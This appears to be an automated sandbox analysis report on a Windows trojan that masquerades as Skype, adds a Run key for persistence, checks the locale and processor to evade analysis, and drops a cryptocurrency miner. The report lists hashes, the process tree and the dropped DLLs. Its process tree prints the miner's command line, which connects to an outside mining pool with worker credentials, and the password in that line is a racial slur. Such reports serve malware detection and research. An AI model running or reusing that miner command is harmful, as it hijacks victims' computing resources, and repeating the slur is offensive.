Analysis

  • max time kernel
    185s
  • max time network
    197s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-11-2022 05:46

General

  • Target

    2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2.exe

  • Size

    1.3MB

  • MD5

    a1bda40c59fd27a982da6e38712d0f0a

  • SHA1

    8b67c4ae2806d9a68a4471687bb05e69a639340a

  • SHA256

    2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2

  • SHA512

    6362eb6e0745ee7d059974d1eadd1ffb31599f43a96cc57bd4c2f285e2db2f0fc28befadb964333cb892325db2314be8689faf62c56273a4590e9e5b2965ca1f

  • SSDEEP

    24576:116ATdlcMtqmaK5T4ddwIetMYVYzgKSzu8eYIIhGlAxhiYtoXFitA4oQu4omQ0:116AplhtZR5CwIjYMzSzu8eYI8GlAxhN

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2.exe
    "C:\Users\Admin\AppData\Local\Temp\2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3348
    • C:\Users\Admin\AppData\Local\Temp\Skype\Skype.exe
      "C:\Users\Admin\AppData\Local\Temp\Skype\Skype.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2712
      • C:\Users\Admin\AppData\Local\Temp\af98734936a7424c90eecd9b469bfaff\Skype.exe
        "C:\Users\Admin\AppData\Local\Temp\af98734936a7424c90eecd9b469bfaff\Skype.exe" -a scrypt -o stratum+tcp://pool.omnicoin.cc:3333 -u jlyon11.slave -p nigger -g no
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks processor information in registry
        PID:4116

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Skype\Skype.exe

    Filesize

    1.3MB

    MD5

    a1bda40c59fd27a982da6e38712d0f0a

    SHA1

    8b67c4ae2806d9a68a4471687bb05e69a639340a

    SHA256

    2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2

    SHA512

    6362eb6e0745ee7d059974d1eadd1ffb31599f43a96cc57bd4c2f285e2db2f0fc28befadb964333cb892325db2314be8689faf62c56273a4590e9e5b2965ca1f

  • C:\Users\Admin\AppData\Local\Temp\Skype\Skype.exe

    Filesize

    1.3MB

    MD5

    a1bda40c59fd27a982da6e38712d0f0a

    SHA1

    8b67c4ae2806d9a68a4471687bb05e69a639340a

    SHA256

    2dc97afe7b079eb95b9b875ae8d836f8d7140582328e2eed894a410eb67e47e2

    SHA512

    6362eb6e0745ee7d059974d1eadd1ffb31599f43a96cc57bd4c2f285e2db2f0fc28befadb964333cb892325db2314be8689faf62c56273a4590e9e5b2965ca1f

  • C:\Users\Admin\AppData\Local\Temp\af98734936a7424c90eecd9b469bfaff\MPIR.dll

    Filesize

    133KB

    MD5

    53bfc187ad3cd270b626d10917173d56

    SHA1

    12fafe1f0224b54a8a2283584048698841190d20

    SHA256

    6b7eb4a0a7f30ab2df9c08f5db2706edbbd2f3eff7abe77d4e76930748f7d790

    SHA512

    168f5f400d81cb836f810c2f95ebd24c4397e72517a7d1b19b96153856d79e2cdb75dd9b8fc90d6d5c38fe469c9c3882ca6197932237a1520f8f12bc7d161f71

  • C:\Users\Admin\AppData\Local\Temp\af98734936a7424c90eecd9b469bfaff\OPENSSL.dll

    Filesize

    844KB

    MD5

    30d5168e299c6490a4592bddb4e3b983

    SHA1

    db7432b9a4501bd05067df6dc2c4ed3e459b3103

    SHA256

    10d43210c5f58c369a8468b1075a73540afb888f318bd6cba3a8811bba70e502

    SHA512

    b7581635f604d0ee50eb2daabc40483f98fd5d1fcbf503f230992afe8f03a61b5b5ea399e23c247c4ff080092f2c198d425ce9bb094168d69fe25765a31fe88e

  • C:\Users\Admin\AppData\Local\Temp\af98734936a7424c90eecd9b469bfaff\Skype.exe

    Filesize

    55KB

    MD5

    7089c7116ae411f342f08026e00b2cdc

    SHA1

    b928561537447cfc297083e08cded6ad9b4a0400

    SHA256

    101de8576981939409e1ba49cd80b9d5e45a4645a0558d3b03bef0b7189e48c6

    SHA512

    651af14aa287d463f95763ddfc7c30b8b3ebd26d1bfef866f09d6df5d194d46520979112f19b7996aeb5436153deae5e3cd154c87f2ec8ae5c04ce0fe74dcdfc

  • C:\Users\Admin\AppData\Local\Temp\af98734936a7424c90eecd9b469bfaff\Skype.exe

    Filesize

    55KB

    MD5

    7089c7116ae411f342f08026e00b2cdc

    SHA1

    b928561537447cfc297083e08cded6ad9b4a0400

    SHA256

    101de8576981939409e1ba49cd80b9d5e45a4645a0558d3b03bef0b7189e48c6

    SHA512

    651af14aa287d463f95763ddfc7c30b8b3ebd26d1bfef866f09d6df5d194d46520979112f19b7996aeb5436153deae5e3cd154c87f2ec8ae5c04ce0fe74dcdfc

  • C:\Users\Admin\AppData\Local\Temp\af98734936a7424c90eecd9b469bfaff\coinutil.dll

    Filesize

    48KB

    MD5

    e63ed0d8d419e4722c7b9334c41cae35

    SHA1

    8dcbee30026b208b1bc07f49a3a6849fdd6d0f61

    SHA256

    93b4df8ba9b1fc75c535395383bcafc84df83989a94e4b606af6527d21a051c8

    SHA512

    90318e8fc98635123f58c11bbd0775f140ef3104e23c9f41bf6c7b9387692851e5d61ba20f2c13e91d640a633df9bdae2fd8847097d258f5ec1ffaee61533e56

  • C:\Users\Admin\AppData\Local\Temp\af98734936a7424c90eecd9b469bfaff\coinutil.dll

    Filesize

    48KB

    MD5

    e63ed0d8d419e4722c7b9334c41cae35

    SHA1

    8dcbee30026b208b1bc07f49a3a6849fdd6d0f61

    SHA256

    93b4df8ba9b1fc75c535395383bcafc84df83989a94e4b606af6527d21a051c8

    SHA512

    90318e8fc98635123f58c11bbd0775f140ef3104e23c9f41bf6c7b9387692851e5d61ba20f2c13e91d640a633df9bdae2fd8847097d258f5ec1ffaee61533e56

  • C:\Users\Admin\AppData\Local\Temp\af98734936a7424c90eecd9b469bfaff\miner.dll

    Filesize

    459KB

    MD5

    5015bd0c4a85822c912f9c252088f9b5

    SHA1

    3697de028448e874fcd02fb3ed30a6fdb376c56b

    SHA256

    14dea6ff9271ec5f4ac3dda59f6ccc69e12f8fbd1d0ded922971ba751a882d13

    SHA512

    caaee8fd9f121cbb0465e78f377a462720bbfce73dd2398c6881461c5a99f1a5bb4a16aefe582192f24ccb1f8823f5b271d45012e43ebf7f06158462c3cadb47

  • C:\Users\Admin\AppData\Local\Temp\af98734936a7424c90eecd9b469bfaff\miner.dll

    Filesize

    459KB

    MD5

    5015bd0c4a85822c912f9c252088f9b5

    SHA1

    3697de028448e874fcd02fb3ed30a6fdb376c56b

    SHA256

    14dea6ff9271ec5f4ac3dda59f6ccc69e12f8fbd1d0ded922971ba751a882d13

    SHA512

    caaee8fd9f121cbb0465e78f377a462720bbfce73dd2398c6881461c5a99f1a5bb4a16aefe582192f24ccb1f8823f5b271d45012e43ebf7f06158462c3cadb47

  • C:\Users\Admin\AppData\Local\Temp\af98734936a7424c90eecd9b469bfaff\mpir.dll

    Filesize

    133KB

    MD5

    53bfc187ad3cd270b626d10917173d56

    SHA1

    12fafe1f0224b54a8a2283584048698841190d20

    SHA256

    6b7eb4a0a7f30ab2df9c08f5db2706edbbd2f3eff7abe77d4e76930748f7d790

    SHA512

    168f5f400d81cb836f810c2f95ebd24c4397e72517a7d1b19b96153856d79e2cdb75dd9b8fc90d6d5c38fe469c9c3882ca6197932237a1520f8f12bc7d161f71

  • C:\Users\Admin\AppData\Local\Temp\af98734936a7424c90eecd9b469bfaff\mpir.dll

    Filesize

    133KB

    MD5

    53bfc187ad3cd270b626d10917173d56

    SHA1

    12fafe1f0224b54a8a2283584048698841190d20

    SHA256

    6b7eb4a0a7f30ab2df9c08f5db2706edbbd2f3eff7abe77d4e76930748f7d790

    SHA512

    168f5f400d81cb836f810c2f95ebd24c4397e72517a7d1b19b96153856d79e2cdb75dd9b8fc90d6d5c38fe469c9c3882ca6197932237a1520f8f12bc7d161f71

  • C:\Users\Admin\AppData\Local\Temp\af98734936a7424c90eecd9b469bfaff\openssl.dll

    Filesize

    844KB

    MD5

    30d5168e299c6490a4592bddb4e3b983

    SHA1

    db7432b9a4501bd05067df6dc2c4ed3e459b3103

    SHA256

    10d43210c5f58c369a8468b1075a73540afb888f318bd6cba3a8811bba70e502

    SHA512

    b7581635f604d0ee50eb2daabc40483f98fd5d1fcbf503f230992afe8f03a61b5b5ea399e23c247c4ff080092f2c198d425ce9bb094168d69fe25765a31fe88e

  • C:\Users\Admin\AppData\Local\Temp\af98734936a7424c90eecd9b469bfaff\usft_ext.dll

    Filesize

    664KB

    MD5

    6c3491eb039af3b749bbae91f80dca4b

    SHA1

    ef2e6cb72d0004cce10fbb12bc1ec6878d1582e0

    SHA256

    f80a6d72a0b4445f17ec8c10268397ca961db946b9aeec5ba3a3b2ac87512b75

    SHA512

    1331b3d548aec11e19b6b452545bd1827aa28b46d383851422d32cb4dc6dce2ee1e9ec5436be10850f08f7f918f3c4ec8f39a16b44084f90ad152e0e337b5c7f

  • C:\Users\Admin\AppData\Local\Temp\af98734936a7424c90eecd9b469bfaff\usft_ext.dll

    Filesize

    664KB

    MD5

    6c3491eb039af3b749bbae91f80dca4b

    SHA1

    ef2e6cb72d0004cce10fbb12bc1ec6878d1582e0

    SHA256

    f80a6d72a0b4445f17ec8c10268397ca961db946b9aeec5ba3a3b2ac87512b75

    SHA512

    1331b3d548aec11e19b6b452545bd1827aa28b46d383851422d32cb4dc6dce2ee1e9ec5436be10850f08f7f918f3c4ec8f39a16b44084f90ad152e0e337b5c7f

  • memory/2712-137-0x00000000746F0000-0x0000000074CA1000-memory.dmp

    Filesize

    5.7MB

  • memory/2712-148-0x00000000746F0000-0x0000000074CA1000-memory.dmp

    Filesize

    5.7MB

  • memory/2712-138-0x00000000746F0000-0x0000000074CA1000-memory.dmp

    Filesize

    5.7MB

  • memory/2712-133-0x0000000000000000-mapping.dmp

  • memory/3348-132-0x00000000746F0000-0x0000000074CA1000-memory.dmp

    Filesize

    5.7MB

  • memory/3348-136-0x00000000746F0000-0x0000000074CA1000-memory.dmp

    Filesize

    5.7MB

  • memory/4116-139-0x0000000000000000-mapping.dmp